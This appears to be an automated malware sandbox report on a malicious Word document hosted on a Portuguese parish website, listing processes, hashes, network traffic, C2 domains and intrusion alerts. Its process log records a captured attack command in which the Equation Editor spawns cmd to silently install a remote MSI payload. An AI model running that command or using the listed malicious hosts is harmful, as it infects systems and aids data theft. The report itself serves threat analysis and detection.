URL: | http://paroquiadamarinhagrande.pt/app/ob.doc |
Full analysis: | https://app.any.run/tasks/d583f322-e279-443f-b4b8-23e58cd7e029 |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
Analysis date: | June 19, 2019, 16:02:11 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MD5: | C5AC282104CBBBB22163203D9F96E091 |
SHA1: | 9F52E0C4846E5CD93B12D599740C1F4B4BA04EF5 |
SHA256: | D554E85C376D838878744A59D6FA0B8B833C1C601903C52DBF9A215A80CD9AEE |
SSDEEP: | 3:N1KOEXiEwmBGgqKGn:COjEw2Gddn |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2912 | "C:\Program Files\Internet Explorer\iexplore.exe" http://paroquiadamarinhagrande.pt/app/ob.doc | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 1 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3516 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2912 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
1352 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | svchost.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
1360 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
2512 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
828 | cmd.exe & /C CD C: & msiexec.exe /i http://paroquiadamarinhagrande.pt/app/tyeupy.msi /quiet | C:\Windows\system32\cmd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3748 | msiexec.exe /i http://paroquiadamarinhagrande.pt/app/tyeupy.msi /quiet | C:\Windows\system32\msiexec.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
1720 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
2480 | "C:\Windows\Installer\MSIB017.tmp" | C:\Windows\Installer\MSIB017.tmp | msiexec.exe | |
User: admin Integrity Level: MEDIUM Version: 3, 3, 8, 1 | ||||
2536 | "C:\Users\admin\AppData\Local\Temp\VDLJPL.exe" | C:\Users\admin\AppData\Local\Temp\VDLJPL.exe | — | MSIB017.tmp |
User: admin Integrity Level: MEDIUM Description: VistaTaskDialog Exit code: 0 Version: 1.0.8.0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1352 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR2245.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1352 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{451623ED-7647-4A63-82EC-0B0D335FFB58} | — | |
MD5:— | SHA256:— | |||
1352 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{49049AFD-33A1-47A9-993C-A61BC90766C2} | — | |
MD5:— | SHA256:— | |||
2912 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
2912 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
1352 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:07C455647969DA30565F9AA9239F481B | SHA256:778185CE9C6AF19F763C3CAA63940E699F1CB13F245882FAFF28889D6577A78D | |||
3516 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\ZOJYL48Y\ob[1].doc | text | |
MD5:9D944CD642BD8D94BEC6E25AFF9831A1 | SHA256:4D43989ACD082511E4EA3EE5CB99320F3087B0342117FCDBCBC1489F0B511946 | |||
3516 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | |
MD5:3628DE2217E921326737F0D2A1EE1A50 | SHA256:4BC49A580297352EA2D2CD62B014C585370E19BC6D6C16D7D433F1E70923B6B7 | |||
1352 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF | binary | |
MD5:9E7FA193AE57AD45FEBA70BC92901D71 | SHA256:147FE88576EB5F620A0C3E0368A7563B3D85E63C58BCC43830E9232E093E2B7A | |||
3516 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\RBQ9OKWY\desktop.ini | ini | |
MD5:4A3DEB274BB5F0212C2419D3D8D08612 | SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1352 | WINWORD.EXE | OPTIONS | 200 | 188.93.230.15:80 | http://paroquiadamarinhagrande.pt/app/ | PT | — | — | malicious |
980 | svchost.exe | PROPFIND | — | 188.93.230.15:80 | http://paroquiadamarinhagrande.pt/app/ | PT | — | — | malicious |
1352 | WINWORD.EXE | HEAD | 200 | 188.93.230.15:80 | http://paroquiadamarinhagrande.pt/app/ob.doc | PT | — | — | malicious |
980 | svchost.exe | PROPFIND | — | 188.93.230.15:80 | http://paroquiadamarinhagrande.pt/app/ | PT | — | — | malicious |
980 | svchost.exe | PROPFIND | — | 188.93.230.15:80 | http://paroquiadamarinhagrande.pt/app/ | PT | — | — | malicious |
980 | svchost.exe | PROPFIND | — | 188.93.230.15:80 | http://paroquiadamarinhagrande.pt/app | PT | — | — | malicious |
1352 | WINWORD.EXE | HEAD | 200 | 188.93.230.15:80 | http://paroquiadamarinhagrande.pt/app/ob.doc | PT | — | — | malicious |
980 | svchost.exe | PROPFIND | 200 | 188.93.230.15:80 | http://paroquiadamarinhagrande.pt/ | PT | html | 35.3 Kb | malicious |
980 | svchost.exe | OPTIONS | 200 | 188.93.230.15:80 | http://paroquiadamarinhagrande.pt/app/ | PT | html | 246 b | malicious |
1352 | WINWORD.EXE | GET | 200 | 188.93.230.15:80 | http://paroquiadamarinhagrande.pt/app/ob.doc | PT | text | 261 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2912 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
2912 | iexplore.exe | 13.107.21.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3516 | iexplore.exe | 188.93.230.15:80 | paroquiadamarinhagrande.pt | Claranet Ltd | PT | malicious |
1720 | msiexec.exe | 188.93.230.15:80 | paroquiadamarinhagrande.pt | Claranet Ltd | PT | malicious |
1352 | WINWORD.EXE | 188.93.230.15:80 | paroquiadamarinhagrande.pt | Claranet Ltd | PT | malicious |
980 | svchost.exe | 188.93.230.15:80 | paroquiadamarinhagrande.pt | Claranet Ltd | PT | malicious |
904 | wscript.exe | 185.247.228.14:7755 | unknownsoft.duckdns.org | — | — | malicious |
2480 | MSIB017.tmp | 104.25.210.99:443 | ipapi.co | Cloudflare Inc | US | shared |
2036 | explorer.exe | 116.255.235.25:80 | www.zjzxxx.com | CHINA UNICOM China169 Backbone | CN | malicious |
1904 | wscript.exe | 103.136.43.131:1425 | vemvemserver.duckdns.org | — | — | malicious |
Domain | IP | Reputation |
---|---|---|
paroquiadamarinhagrande.pt |
| malicious |
www.bing.com |
| whitelisted |
dns.msftncsi.com |
| shared |
ipapi.co |
| shared |
unknownsoft.duckdns.org |
| malicious |
vemvemserver.duckdns.org |
| malicious |
www.zjzxxx.com |
| malicious |
www.livetruephotography.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
1720 | msiexec.exe | Potential Corporate Privacy Violation | SUSPICIOUS [PTsecurity] Executable application_x-msi Download |
1720 | msiexec.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] Executable application_x-msi Download |
1720 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Executable ExeToMSI Download |
— | — | Potential Corporate Privacy Violation | ET POLICY External IP Lookup Domain (ipapi .co in DNS lookup) |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
1904 | wscript.exe | A Network Trojan was detected | ET TROJAN WSHRAT CnC Checkin |
1904 | wscript.exe | A Network Trojan was detected | ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1 |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
2480 | MSIB017.tmp | A Network Trojan was detected | MALWARE [PTsecurity] Loda Logger CnC Request |